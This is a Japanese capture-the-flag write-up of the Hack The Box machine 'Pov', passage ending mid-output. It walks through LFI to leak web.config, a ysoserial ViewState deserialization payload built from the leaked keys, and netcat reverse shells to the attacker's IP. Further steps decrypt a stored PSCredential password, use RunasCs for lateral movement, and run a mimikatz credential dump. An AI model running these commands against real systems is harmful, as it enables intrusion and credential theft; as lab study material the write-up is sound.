初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「Pov」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.10.11.251 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.251:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 02:45 EST
Initiating Ping Scan at 02:45
Scanning 10.10.11.251 [4 ports]
Completed Ping Scan at 02:45, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:45
Completed Parallel DNS resolution of 1 host. at 02:45, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:45
Scanning 10.10.11.251 [1 port]
Discovered open port 80/tcp on 10.10.11.251
Completed SYN Stealth Scan at 02:45, 0.24s elapsed (1 total ports)
Nmap scan report for 10.10.11.251
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2024-03-02 02:45:39 EST for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
WindwosのBOXで80しか空いてないのは珍しい。
一応UDPのPortも列挙しておく。
┌──(root㉿kali)-[~/work]
└─# nmap -sU -n -Pn -v 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 02:44 EST
Initiating UDP Scan at 02:44
Scanning 10.10.11.251 [1000 ports]
UDP Scan Timing: About 15.50% done; ETC: 02:48 (0:02:49 remaining)
UDP Scan Timing: About 30.50% done; ETC: 02:48 (0:02:19 remaining)
UDP Scan Timing: About 45.50% done; ETC: 02:48 (0:01:49 remaining)
UDP Scan Timing: About 60.05% done; ETC: 02:48 (0:01:20 remaining)
UDP Scan Timing: About 74.55% done; ETC: 02:48 (0:00:52 remaining)
Completed UDP Scan at 02:48, 201.66s elapsed (1000 total ports)
Nmap scan report for 10.10.11.251
Host is up.
All 1000 scanned ports on 10.10.11.251 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 201.75 seconds
Raw packets sent: 2088 (98.552KB) | Rcvd: 1 (28B)
何もなさそう。
まぁここから攻めていくしかないですね。リアルワールドぽくて楽しそうだ。
Web探索
ブラウジング
実際にサイトにアクセスする。
ASP.NETのサイトが見える。pov.htbのドメインが見えるので/etc/hostsに登録しておく。
┌──(root💀kali)-[~/work]
└─# vim /etc/hosts
10.10.11.251 pov.htb
サブドメイン探索
ffufを使ってサブドメインの列挙を行う。
┌──(root㉿kali)-[~/work]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://pov.htb/ -H "HOST: FUZZ.pov.htb" -fs 12330 -t 150 -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://pov.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.pov.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: all
:: Filter : Response size: 12330
________________________________________________
dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 890ms]
xinaomenbaijiale [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5373ms]
xinli [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5392ms]
* [Status: 400, Size: 334, Words: 21, Lines: 7, Duration: 214ms]
:: Progress: [100000/100000] :: Job [1/1] :: 493 req/sec :: Duration: [0:03:07] :: Errors: 0 ::
色々と出てきた。このうち、サブドメインとして機能していたのはdevのみだった。
このアドレスも/etc/hostsに追加しておく。
10.10.11.251 pov.htb dev.pov.htb
実際のサイトは以下のように見える。
ディレクトリ探索
dirsearchを使って列挙を行う。
┌──(root㉿kali)-[~/work]
└─# dirsearch -u http://dev.pov.htb/portfolio/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/work/reports/http_dev.pov.htb/_portfolio__24-03-02_03-16-49.txt
Target: http://dev.pov.htb/
[03:16:49] Starting: portfolio/
[03:16:53] 302 - 162B - /portfolio/%2e%2e//google.com -> http://dev.pov.htb/portfolio/google.com
[03:16:53] 302 - 158B - /portfolio/%3f/ -> /default.aspx?aspxerrorpath=/portfolio/?/
[03:16:53] 403 - 312B - /portfolio/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[03:16:53] 302 - 161B - /portfolio/.asmx -> /default.aspx?aspxerrorpath=/portfolio/.asmx
[03:16:53] 302 - 161B - /portfolio/.ashx -> /default.aspx?aspxerrorpath=/portfolio/.ashx
[03:17:08] 403 - 312B - /portfolio/\..\..\..\..\..\..\..\..\..\etc\passwd
[03:17:13] 302 - 165B - /portfolio/admin%20/ -> /default.aspx?aspxerrorpath=/portfolio/admin%20/
[03:17:14] 302 - 162B - /portfolio/admin. -> /default.aspx?aspxerrorpath=/portfolio/admin.
[03:17:30] 301 - 159B - /portfolio/assets -> http://dev.pov.htb/portfolio/assets/
[03:17:30] 302 - 156B - /portfolio/assets/ -> http://dev.pov.htb:8080/portfolio
[03:17:30] 302 - 163B - /portfolio/asset.. -> /default.aspx?aspxerrorpath=/portfolio/asset..
[03:17:38] 403 - 312B - /portfolio/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[03:17:43] 200 - 5KB - /portfolio/contact.aspx
[03:17:48] 302 - 235B - /portfolio/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console -> /default.aspx?aspxerrorpath=/portfolio/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[03:17:59] 302 - 166B - /portfolio/index.php. -> /default.aspx?aspxerrorpath=/portfolio/index.php.
[03:18:01] 302 - 180B - /portfolio/javax.faces.resource.../ -> /default.aspx?aspxerrorpath=/portfolio/javax.faces.resource.../
[03:18:01] 302 - 272B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[03:18:01] 302 - 239B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/help/* -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[03:18:01] 302 - 267B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[03:18:01] 302 - 265B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[03:18:01] 302 - 264B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[03:18:01] 302 - 246B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[03:18:01] 302 - 249B - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[03:18:01] 302 - 213B - /portfolio/jolokia/exec/java.lang:type=Memory/gc -> /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/java.lang:type=Memory/gc
[03:18:01] 302 - 233B - /portfolio/jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used -> /default.aspx?aspxerrorpath=/portfolio/jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[03:18:01] 302 - 221B - /portfolio/jolokia/read/java.lang:type=*/HeapMemoryUsage -> /default.aspx?aspxerrorpath=/portfolio/jolokia/read/java.lang:type=*/HeapMemoryUsage
[03:18:01] 302 - 214B - /portfolio/jolokia/search/*:j2eeType=J2EEServer,* -> /default.aspx?aspxerrorpath=/portfolio/jolokia/search/*:j2eeType=J2EEServer,*
[03:18:01] 302 - 226B - /portfolio/jolokia/write/java.lang:type=Memory/Verbose/true -> /default.aspx?aspxerrorpath=/portfolio/jolokia/write/java.lang:type=Memory/Verbose/true
[03:18:04] 302 - 166B - /portfolio/login.wdm%2e -> /default.aspx?aspxerrorpath=/portfolio/login.wdm.
[03:18:21] 302 - 168B - /portfolio/rating_over. -> /default.aspx?aspxerrorpath=/portfolio/rating_over.
[03:18:25] 302 - 168B - /portfolio/service.asmx -> /default.aspx?aspxerrorpath=/portfolio/service.asmx
[03:18:30] 302 - 164B - /portfolio/static.. -> /default.aspx?aspxerrorpath=/portfolio/static..
[03:18:35] 302 - 165B - /portfolio/Trace.axd -> /default.aspx?aspxerrorpath=/portfolio/Trace.axd
[03:18:36] 302 - 195B - /portfolio/umbraco/webservices/codeEditorSave.asmx -> /default.aspx?aspxerrorpath=/portfolio/umbraco/webservices/codeEditorSave.asmx
[03:18:42] 302 - 165B - /portfolio/WEB-INF./ -> /default.aspx?aspxerrorpath=/portfolio/WEB-INF./
[03:18:44] 302 - 171B - /portfolio/WebResource.axd?d=LER8t9aS -> /default.aspx?aspxerrorpath=/portfolio/WebResource.axd
Task Completed
/portfolio/contact.aspxくらいかな気になるのは。
katanaでエンドポイントも見ておく。
┌──(root㉿kali)-[~/work]
└─# katana -u http://dev.pov.htb/portfolio/
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/
projectdiscovery.io
[INF] Current katana version v1.0.5 (latest)
[INF] Started standard crawling for => http://dev.pov.htb/portfolio/
http://dev.pov.htb/portfolio/
http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.affix.js
http://dev.pov.htb/portfolio/assets/js/steller.js
http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.bundle.js
http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/themify-icons.css
http://dev.pov.htb/portfolio/contact.aspx
http://dev.pov.htb/portfolio/assets/css/steller.css
http://dev.pov.htb/portfolio/assets/vendors/jquery/jquery-3.4.1.js
http://dev.pov.htb/portfolio/default.aspx
http://dev.pov.htb:8080
default.aspxねぇ、8080については内部のPortかな、転送してそう。
default.aspxにcv.pdfをダウンロードできる機能があるので押してみる。
PDFがダウンロードできた。中身はそれほど新しそうな情報なし。
exiftoolで確認してみる。
┌──(root㉿kali)-[/home/kali/Downloads]
└─# exiftool cv.pdf
ExifTool Version Number : 12.76
File Name : cv.pdf
Directory : .
File Size : 148 kB
File Modification Date/Time : 2024:03:02 03:29:10-05:00
File Access Date/Time : 2024:03:02 03:29:11-05:00
File Inode Change Date/Time : 2024:03:02 03:29:10-05:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.7
Linearized : No
Page Count : 1
Language : es
Tagged PDF : Yes
XMP Toolkit : 3.1-701
Producer : Microsoft® Word para Microsoft 365
Creator : Turbo
Creator Tool : Microsoft® Word para Microsoft 365
Create Date : 2023:09:15 12:47:15-06:00
Modify Date : 2023:09:15 12:47:15-06:00
Document ID : uuid:3046DD6C-A619-4073-9589-BE6776F405F2
Instance ID : uuid:3046DD6C-A619-4073-9589-BE6776F405F2
Author : Turbo
良い情報はなさそう。
イニシャルアクセス
LFI
PDFを持ってくるPOSTリクエストは以下のようになっている。インターセプトをONにして持ってくる。
このfileにLFIの脆弱性がないか試してみるが、..\..\..\..\boot.iniや../../boot.iniは通らなかった。
一旦同階層にありそうなファイルをBurpのIntruderで列挙していく。
ファイルのリストをSimpleListとしてBurpに食わせる。
列挙してファイルサイズが明らかに違うものを見つける。
default.aspxが帰ってきた。コードとPDFを参照する階層は同階層っぽい。
では上位階層にweb.configがあると仮定できる。これはASP.NETの階層構造を調べてもらえればわかると思う。
..\web.configを打ち込む。
確認できた。
RCE
ASP.NET 4.5
手に入れたweb.configの中身を確認すると以下でVersionが確認できる。
<httpRuntime targetFramework="4.5" />
これについて調べていると以下の記事を発見する。
この記事を参考にして、PayloadをWindows端末で作成する。
作成には以下のリポジトリからysoserial.exeを手に入れて回す必要があるので。
reverse shell
まず叩き込むreverseshellを作成する。いつものrevshellさんです。
これをysoserial.exeを使ってシリアライズします。
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties --path="/portfolio/default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" -c "コマンド"
このシリアライズされてるPayloadを__VIEWSTATEに叩き込む。
リバースシェルをゲットしました!ですがこれでUserフラグを取れるわけではありません。
このPowershellのリバースシェルではWinPeasの出力がリアルタイムで見えないのでシェルをアップグレードします。
nc.exeをBOXに送り込み、起動させて再度シェルを受け取ります。
PS C:\Users\sfitz\Desktop> .\nc.exe 10.10.14.83 1234 -e cmd
安定したシェルをゲットしました。
クレデンシャルアクセス
とりあえず何か情報がないか探っていきます。
winPEAS
ニッコリさんを回します。
PS C:\Users\sfitz\Desktop> .\winPEASany.exe
.\winPEASany.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.'
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
Creating Dynamic lists, this could take a while, please wait...
- Loading sensitive_files yaml definitions file...
- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...
System Information
Basic System Information
Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hostname: pov
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 3/2/2024 2:50:28 AM
HighIntegrity: False
PartOfDomain: False
Hotfixes:
... 省略
Users
Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
Current user: sfitz
Current groups: Domain Users, Everyone, Users, Batch, Console Logon, Authenticated Users, This Organization, Local account, IIS_IUSRS, Local, dev, NTLM Authentication
=================================================================================================
POV\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-NotExpi-Req
POV\alaading
|->Groups: Remote Management Users,Users
|->Password: CanChange-NotExpi-Req
POV\DefaultAccount(Disabled): A user account managed by the system.
|->Groups: System Managed Accounts Group
|->Password: CanChange-NotExpi-NotReq
POV\Guest(Disabled): Built-in account for guest access to the computer/domain
|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq
POV\sfitz
|->Groups: Users
|->Password: CanChange-NotExpi-Req
POV\WDAGUtilityAccount(Disabled): A user account managed and used by the system for Windows Defender Application Guard scenarios.
|->Password: CanChange-Expi-Req
....省略
Network Ifaces and known hosts
The masks are only for the IPv4 addresses
Ethernet0 2[00:50:56:B9:C1:9C]: 10.10.11.251, fe80::f335:1023:8d00:b74a%4 / 255.255.254.0
Gateways: 10.10.10.2
DNSs: 127.0.0.1
Known hosts:
10.10.10.2 00-50-56-B9-A8-B4 Dynamic
10.10.11.255 FF-FF-FF-FF-FF-FF Static
169.254.255.255 00-00-00-00-00-00 Invalid
224.0.0.22 01-00-5E-00-00-16 Static
224.0.0.251 01-00-5E-00-00-FB Static
224.0.0.252 01-00-5E-00-00-FC Static
Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
Known hosts:
224.0.0.22 00-00-00-00-00-00 Static
Current TCP Listening Ports
Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 852 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 480 wininit
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 924 svchost
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 1204 svchost
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 620 services
TCP 0.0.0.0 49668 0.0.0.0 0 Listening 628 lsass
alaadingがいるのでこいつに横移動するのかと予想。また、内部のPortからも特別なPortもなくLDAPもないのでAD環境もないと考えられる。
なら単純な列挙系だと考え、Peasの出力を追ったが、何もなかった。
Powerless
単純な列挙系であればPowerlessさんが役に立つ。回す。
PS C:\Users\sfitz\Desktop> .\Powerless.bat
.\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
Host Name: POV
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA076
Original Install Date: 10/26/2023, 1:01:55 PM
System Boot Time: 2/29/2024, 9:02:13 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,138 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,670 MB
Virtual Memory: In Use: 1,129 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.251
[02]: fe80::f335:1023:8d00:b74a
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
----- Architecture -------
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5507
------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: POV$
USER INFORMATION
----------------
User Name SID
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000
...省略
C:\Users\sfitz\3D Objects\desktop.ini
C:\Users\sfitz\Contacts\desktop.ini
C:\Users\sfitz\Desktop\accesschk64.exe
C:\Users\sfitz\Desktop\desktop.ini
C:\Users\sfitz\Desktop\Microsoft
C:\Users\sfitz\Desktop\nc.exe
C:\Users\sfitz\Desktop\Powerless.bat
C:\Users\sfitz\Desktop\winPEAS.bat
C:\Users\sfitz\Desktop\winPEASany.exe
C:\Users\sfitz\Documents\connection.xml
C:\Users\sfitz\Documents\desktop.ini
C:\Users\sfitz\Documents\My Music
C:\Users\sfitz\Documents\My Pictures
C:\Users\sfitz\Documents\My Videos
C:\Users\sfitz\Downloads\desktop.ini
C:\Users\sfitz\Links\desktop.ini
C:\Users\sfitz\Links\Desktop.lnk
C:\Users\sfitz\Links\Downloads.lnk
C:\Users\sfitz\Music\desktop.ini
C:\Users\sfitz\Pictures\desktop.ini
C:\Users\sfitz\Saved Games\desktop.ini
C:\Users\sfitz\Searches\desktop.ini
C:\Users\sfitz\Searches\Everywhere.search-ms
C:\Users\sfitz\Searches\Indexed Locations.search-ms
C:\Users\sfitz\Videos\desktop.ini
-------- Exploring program directories and C:\ ---------
--- Program Files ---
Common Files
internet explorer
VMware
Windows Defender
Windows Defender Advanced Threat Protection
C:\Users\sfitz\Documents\connection.xmlを見つける。
この中身を確認すると以下のように出力される。
PS C:\Users\sfitz\Desktop> cat C:\Users\sfitz\Documents\connection.xml
cat C:\Users\sfitz\Documents\connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
alaadingのクレデンシャルが見えるこれを復元するためにJohnや以下サイトを利用してみたが上手くいかない。
PSCredential
System.Management.Automation.PSCredentialのエンコード方法がよくわからんので、GPTさんに聞いてみた。
答えを教えてくれたので、実行します。
パスワードが見えます!これで横移動できそうですね!
ラテラルムーブメント
runas
平文でクレデンシャル情報を手に入れたら最初に思いつくのはrunasコマンドでしょう。
PS C:\Users\sfitz\Desktop> runas /user:alaading "C:\windows\temp\nc.exe 10.10.14.83 7777 -e cmd"
最初に試してみましたが、うまくいきませんでした。
パスワード入力タイミングでスルーされてしまうので。CLIだとうまくいかないかなぁとか思ってました。
Start-Process
次はpowershellのStart-Processコマンドでしょうかね。
以下のコマンドを打ちます。
$password = ConvertTo-SecureString "f8gQ8fynP44ek1m3" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("alaading", $password)
Start-Process -NoNewWindow powershell "C:\windows\temp\nc.exe 10.10.14.83 7777 -e cmd" -Credential $cred
色々試してみましたが通りませんでした。
RunasCs
runasを色々調べていると、以下のリポジトリを発見しました。
これを使えば簡易的に出力をリモートホストにリダイレクトするようになるとのことで、利用してみます。
PS C:\Users\sfitz\Desktop> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:7777
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:7777
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5777b$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3368 created in background.
PS C:\Users\sfitz\Desktop>
上手くいきました。
これでUserフラグを獲得できます。
権限昇格
SeDebugPrivilege
権限を確認します。
PS C:\Users\alaading\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\alaading\Desktop>
SeDebugPrivilege権限が生えてるのでlsass.exeを攻めていこうと思います。
とりあえずミミミですね。
mimikatz
mimikatzを回します。
PS C:\Users\alaading\Desktop> .\mimikatz.exe
.\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 2846665 (00000000:002b6fc9)
Session : Batch from 0
User Name : sfitz
Domain : POV
Logon Server : POV
Logon Time : 3/1/2024 12:48:28 AM
SID : S-1-5-21-2506154456-4081221362-271687478-1000
msv :
[00000003] Primary
* Username : sfitz
* Domain : POV
* NTLM : 012e5ed95e8745ea5180f81648b6ec94
* SHA1 : 535051ba0fbd3126b8e4f23dab348c1ff30b9f09
* DPAPI : 535051ba0fbd3126b8e4f23dab348c1f
tspkg :
wdigest :
* Username : sfitz
* Domain : POV
* Password : (null)
kerberos :
* Username : sfitz
* Domain : POV
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 358267 (00000000:0005777b)
Session : Batch from 0
User Name : sfitz
Domain : POV
Logon Server : POV
Logon Time : 2/29/2024 9:03:21 PM
SID : S-1-5-21-2506154456-4081221362-271687478-1000
msv :
[00000003] Primary
* Username : sfitz
* Domain : POV
* NTLM : 012e5ed95e8745ea5180f81648b6ec94
* SHA1 : 535051ba0fbd3126b8e4f23dab348c1ff30b9f09
* DPAPI : 535051ba0fbd3126b8e4f23dab348c1f
tspkg :
wdigest :
* Username : sfitz
* Domain : POV
* Password : (null)
kerberos :
* Username : sfitz
